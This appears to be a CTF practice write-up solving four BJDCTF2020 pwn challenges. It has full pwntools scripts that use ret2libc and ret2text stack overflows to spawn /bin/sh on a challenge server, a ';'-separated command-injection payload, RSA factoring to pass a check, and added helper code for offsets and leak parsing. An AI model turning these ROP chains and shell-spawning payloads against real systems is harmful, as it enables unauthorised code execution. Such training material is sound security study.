PWN-PRACTICE-CTFSHOW-4

    • BJDCTF2020-babyrouter
    • BJDCTF2020-babystack
    • BJDCTF2020-dizzy
    • BJDCTF2020-encryptde stack

BJDCTF2020-babyrouter

Stack overflow, ret2libc: leak the address of puts() through the GOT, compute the libc base from the known offset, then return to main and call system("/bin/sh").

# -*- coding:utf-8 -*-
from pwn import *
context.log_level = "debug"
#io = process("./pwn1")
io = remote("pwn.challenge.ctf.show", 28034)
elf = ELF("./pwn1")

puts_got = elf.got["puts"]
puts_plt = elf.plt["puts"]
main_addr = 0x4006AD
pop_rdi = 0x400733            # pop rdi; ret
ret = 0x4004c9                # ret; keeps rsp 16-byte aligned when system() is entered

# Stage 1: puts(puts@got) leaks the libc address of puts(), then return to main for a second overflow
io.recvuntil(b"tell me u story!\n")
payload = b"a"*0x20 + b"b"*8 + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main_addr)   # 0x20 buffer + 8 saved rbp
io.sendline(payload)
puts_addr = u64(io.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))
print("puts_addr==" + hex(puts_addr))
# libc-2.23 (Ubuntu 16.04, amd64) offsets
libc_base = puts_addr - 0x06f690
system = libc_base + 0x045390
binsh = libc_base + 0x18cd57

# Stage 2: system("/bin/sh")
io.recvuntil(b"tell me u story!\n")
payload = b"a"*0x20 + b"b"*8 + p64(pop_rdi) + p64(binsh) + p64(ret) + p64(system) + p64(main_addr)
io.sendline(payload)

io.interactive()

BJDCTF2020-babystack

Stack overflow, ret2text: a name length of -1 is accepted by the program but treated as a huge unsigned count by the read that follows, so the name overruns the 0x10-byte buffer and the return address can be pointed at the backdoor function at 0x4006E6 (a ret gadget in front keeps the stack 16-byte aligned for the system() call inside it).

# -*- coding:utf-8 -*-
from pwn import *
context.log_level = "debug"
#io = process("./pwn1")
io = remote("pwn.challenge.ctf.show", 28177)
elf = ELF("./pwn1")

# length -1: passes the program's length handling but becomes a huge unsigned read size
io.sendlineafter(b"the length of your name:\n", b"-1")

backdoor = 0x4006E6
ret = 0x400561                # ret; keeps rsp 16-byte aligned for system() in the backdoor
io.recvuntil(b"u name?\n")
payload = b"a"*0x10 + b"b"*8 + p64(ret) + p64(backdoor)   # 0x10 buffer + 8 saved rbp
io.sendline(payload)

io.interactive()

BJDCTF2020-dizzy

Abuse the fact that a Linux shell can run several commands on one command line.

Linux can run several commands on a single command line:
	;  -- commands separated by a semicolon run one after another; a failing command does not stop the ones after it
	&& -- commands separated by && also run in sequence, but the chain stops at the first command that fails; as long as nothing fails it continues to the end
	|| -- commands separated by || stop at the first command that succeeds, whatever follows it; a failing command hands over to the next one, until one succeeds or the list is exhausted

Build the input so that, after the program adds 0x1BF52 to every word, the buffer holds "PvvN| 1S S0 GREAT!;/bin/sh\x00". system() hands the whole string to sh; the pipeline before the semicolon fails (no such commands), but because of the ";" sh continues and runs /bin/sh anyway.
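The script below only subtracts 0x1BF52 from each word and relies on the bytes being ASCII. As an added example (not code from the writeup), the following generalises the encoding to any command: it wraps the subtraction modulo 2^32 and maps the result into the signed range that scanf("%d") accepts, models the binary's own addition so the result can be checked offline, and runs the writeup's bogus prefix through a real sh with each separator, using "echo reached" as a harmless stand-in for /bin/sh. It assumes the program reads each word with %d and adds the constant in 32-bit arithmetic; the 80-byte buffer and the constant are the writeup's.

```python
import shutil
import struct
import subprocess

ADD_CONST = 0x1BF52   # constant the challenge adds to every 4-byte word (from the writeup)
WORDS = 20            # 20 words x 4 bytes = the 80-byte buffer the writeup fills


def encode_words(cmd, nwords=WORDS, add=ADD_CONST):
    """Integers to feed scanf("%d") so that, after the program adds `add` to each word
    (assumed: 32-bit int arithmetic, so the sum wraps mod 2**32), the buffer holds `cmd`
    followed by NUL padding.  Results are signed 32-bit values, which is what %d accepts."""
    if len(cmd) >= nwords * 4:
        raise ValueError("command does not fit with a terminating NUL")
    buf = cmd.ljust(nwords * 4, b"\x00")
    out = []
    for i in range(0, len(buf), 4):
        word = struct.unpack("<I", buf[i:i + 4])[0]
        v = (word - add) & 0xFFFFFFFF          # subtract modulo 2**32 ...
        if v >= 0x80000000:                    # ... then map into the signed range for %d
            v -= 0x100000000
        out.append(v)
    return out


def simulate_program(values, add=ADD_CONST):
    """Model of the binary's side: add the constant in 32-bit arithmetic and store
    each word little-endian.  Used to verify the encoding offline."""
    return b"".join(struct.pack("<I", (v + add) & 0xFFFFFFFF) for v in values)


def command_seen_by_system(values):
    """system() treats the buffer as a C string: everything after the first NUL is ignored."""
    return simulate_program(values).split(b"\x00", 1)[0]


def separator_demo():
    """Run the writeup's bogus prefix joined to a harmless stand-in for /bin/sh
    ('echo reached') with each separator.  Returns {separator: (stdout, exit status)},
    or None when no POSIX sh is available."""
    sh = shutil.which("sh")
    if sh is None:
        return None
    results = {}
    for sep in (";", "&&", "||"):
        cmdline = "PvvN| 1S S0 GREAT!" + sep + "echo reached"
        r = subprocess.run([sh, "-c", cmdline], capture_output=True, text=True)
        results[sep] = (r.stdout.strip(), r.returncode)
    return results


if __name__ == "__main__":
    vals = encode_words(b"PvvN| 1S S0 GREAT!;/bin/sh")
    print(vals)                              # the 20 numbers to send, one per line
    print(command_seen_by_system(vals))
    print(separator_demo())
```

With ";" the echo runs even though the pipeline in front of it fails; with "&&" it never runs, which is why the writeup's payload uses a semicolon and not &&.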

# -*- coding:utf-8 -*-
from pwn import *
context.log_level = "debug"
#io = process("./pwn1")
io = remote("pwn.challenge.ctf.show", 28161)
elf = ELF("./pwn1")

# desired contents of the 80-byte buffer: the command string plus NUL padding
s = b"PvvN| 1S S0 GREAT!;/bin/sh".ljust(80, b"\x00")
# the program adds 0x1BF52 to every 4-byte little-endian word it reads,
# so send each word minus 0x1BF52 (the padding words come out negative, which %d accepts)
arr = [u32(s[i:i + 4]) - 0x1BF52 for i in range(0, len(s), 4)]

#io.recvuntil(b"Let's play this!")
for v in arr:                 # 20 words
    io.sendline(str(v).encode())

io.interactive()

BJDCTF2020-encryptde stack

The program prints a random number as an RSA ciphertext and expects the plaintext back; this repeats 20 times. n factors into the p and q given below, so d is recovered from e and phi(n) and each round is answered with pow(c, d, n). Afterwards there is a stack overflow, exploited with ret2libc as in babyrouter.
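The writeup states p and q without saying where they came from. As an added example (not the writeup's code), the following recovers them from n with Pollard's rho, which takes a fraction of a second for a 57-bit modulus, confirms both factors are prime, derives d, and wraps the per-round decryption into a function that turns a ciphertext line into the reply. n and e are the page's values; the plaintext used in the usage is made up.

```python
import math
import random

N = 94576960329497431   # modulus from the writeup
E = 65537


def is_probable_prime(n):
    """Miller-Rabin; the fixed bases below are deterministic for n < 3.3e24."""
    if n < 2:
        return False
    small = (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37)
    for p in small:
        if n % p == 0:
            return n == p
    d, s = n - 1, 0
    while d % 2 == 0:
        d //= 2
        s += 1
    for a in small:
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(s - 1):
            x = x * x % n
            if x == n - 1:
                break
        else:
            return False
    return True


def pollard_rho(n, seed=1):
    """Pollard's rho with Floyd cycle detection; returns a nontrivial factor of n.
    Needs roughly sqrt(p) steps for the smallest factor p, so a 57-bit n is instant."""
    if n % 2 == 0:
        return 2
    rng = random.Random(seed)            # fixed seed keeps the example reproducible
    while True:
        c = rng.randrange(1, n)
        x = y = rng.randrange(2, n)
        d = 1
        while d == 1:
            x = (x * x + c) % n
            y = (y * y + c) % n
            y = (y * y + c) % n
            d = math.gcd(abs(x - y), n)
        if d != n:                       # d == n means the walk degenerated: retry with a new c
            return d


def recover_private_key(n, e):
    """Factor n, check both factors are prime, then derive d = e^-1 mod phi(n)."""
    p = pollard_rho(n)
    q = n // p
    if p * q != n or not (is_probable_prime(p) and is_probable_prime(q)):
        raise ValueError("n is not a product of two primes, or factoring failed")
    phi = (p - 1) * (q - 1)
    d = pow(e, -1, phi)                  # Python 3.8+; libnum.invmod(e, phi) is equivalent
    return min(p, q), max(p, q), d


def encrypt(m, e, n):
    return pow(m, e, n)


def decrypt(c, d, n):
    return pow(c, d, n)


def answer_line(line, d, n):
    """Turn one ciphertext line as the challenge prints it into the reply to send back."""
    return str(decrypt(int(line.strip()), d, n)).encode()


if __name__ == "__main__":
    p, q, d = recover_private_key(N, E)
    print(p, q, d)
```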

# -*- coding:utf-8 -*-
from pwn import *
context.log_level = "debug"
#io = process("./pwn1")
io = remote("pwn.challenge.ctf.show", 28163)
elf = ELF("./pwn1")

# RSA parameters: n = p * q
n = 94576960329497431
e = 65537
p = 261571747
q = 361571773
assert p * q == n
phin = (p - 1) * (q - 1)
d = pow(e, -1, phin)          # modular inverse (Python 3.8+; libnum.invmod(e, phin) does the same)

# 20 rounds: read the ciphertext, answer with the plaintext
io.recvuntil(b"to encrypt it\n")
for i in range(20):
    c = int(io.recvuntil(b"\n")[:-1])
    m = pow(c, d, n)
    io.sendline(str(m).encode())
    io.recvline()

puts_got = elf.got["puts"]
puts_plt = elf.plt["puts"]
vuln_addr = 0x400B30
pop_rdi = 0x40095a            # pop rdi; ret
ret = 0x4006e1                # ret; keeps rsp 16-byte aligned when system() is entered

# Stage 1: leak puts() and return to the vulnerable function
io.recvuntil(b"inpu1t you name:\n")
payload = b"a"*0x48 + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(vuln_addr)   # 0x48 = buffer + saved rbp
io.sendline(payload)
puts_addr = u64(io.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))
print("puts_addr==" + hex(puts_addr))
# libc-2.23 (Ubuntu 16.04, amd64) offsets
libc_base = puts_addr - 0x06f690
system = libc_base + 0x045390
binsh = libc_base + 0x18cd57

# Stage 2: system("/bin/sh")
io.recvuntil(b"inpu1t you name:\n")
payload = b"a"*0x48 + p64(pop_rdi) + p64(binsh) + p64(ret) + p64(system) + p64(vuln_addr)
io.sendline(payload)

io.interactive()
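Both ret2libc scripts on this page (babyrouter and encryptde stack) hard-code the overflow offset, parse the puts() leak with [-6:].ljust(8) and trust the libc offsets. As an added example, not code from the writeup, the following pulls those steps into checked helpers using only the standard library: a pwntools-style cyclic pattern so the 0x28 / 0x48 offsets can be read off the 8 bytes sitting at rsp when the overflowed function returns, leak parsing, a page-alignment check on the computed libc base (a base with low bits set means the wrong libc or a bad leak), and the two chains with the reason for the extra ret gadget. The libc offsets are the libc-2.23 ones used by the scripts above; the leak bytes in the test are constructed.

```python
import struct

# libc-2.23 (Ubuntu 16.04, amd64) offsets used by both scripts above
PUTS_OFF = 0x06f690
SYSTEM_OFF = 0x045390
BINSH_OFF = 0x18cd57


def p64(v):
    return struct.pack("<Q", v)


def cyclic(length, alphabet=b"abcdefghijklmnopqrstuvwxyz", n=4):
    """De Bruijn sequence (same construction as pwntools' cyclic()): every
    n-byte window is unique, so the bytes that land on a saved return address
    identify their own offset."""
    k = len(alphabet)
    a = [0] * (k * n)
    out = bytearray()

    def db(t, p):
        if len(out) >= length:
            return
        if t > n:
            if n % p == 0:
                out.extend(alphabet[a[i]] for i in range(1, p + 1))
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return bytes(out[:length])


def cyclic_find(value, n=4, search_len=0x1000):
    """Offset in the pattern of `value`: the 8 bytes at rsp when the overflowed
    function executes ret (x86-64), or the 4 bytes of a crashing eip (x86)."""
    return cyclic(search_len).find(value[:n])


def parse_puts_leak(raw):
    """puts() writes the 6 significant bytes of a 0x7f... address and stops at the
    first NUL; zero-extend those 6 bytes to a 64-bit value."""
    idx = raw.find(b"\x7f")
    if idx < 5:
        raise ValueError("no 6-byte address ending in 0x7f in the leak")
    return struct.unpack("<Q", raw[idx - 5:idx + 1].ljust(8, b"\x00"))[0]


def libc_base(puts_addr):
    """libc is mmap'ed page aligned, so a base with low bits set means the
    offsets belong to a different libc (or the leak was misparsed)."""
    base = puts_addr - PUTS_OFF
    if base & 0xfff:
        raise ValueError("libc base %#x is not page aligned" % base)
    return base


def leak_chain(offset, pop_rdi, puts_got, puts_plt, ret_to):
    """Stage 1: puts(puts@got), then return to the vulnerable function."""
    return b"a" * offset + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(ret_to)


def system_chain(offset, pop_rdi, ret, base, ret_to):
    """Stage 2: the extra `ret` keeps rsp 16-byte aligned when system() is entered,
    which glibc's SSE code (movaps) requires."""
    return (b"a" * offset + p64(pop_rdi) + p64(base + BINSH_OFF)
            + p64(ret) + p64(base + SYSTEM_OFF) + p64(ret_to))


if __name__ == "__main__":
    pattern = cyclic(100)                       # send this instead of "a"*N, crash, read rsp
    print(cyclic_find(pattern[0x28:0x30]))      # -> 0x28, the babyrouter offset
    base = libc_base(parse_puts_leak(p64(0x7f4c2be1f690)[:6] + b"\n"))   # constructed leak
    print(hex(base))
```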
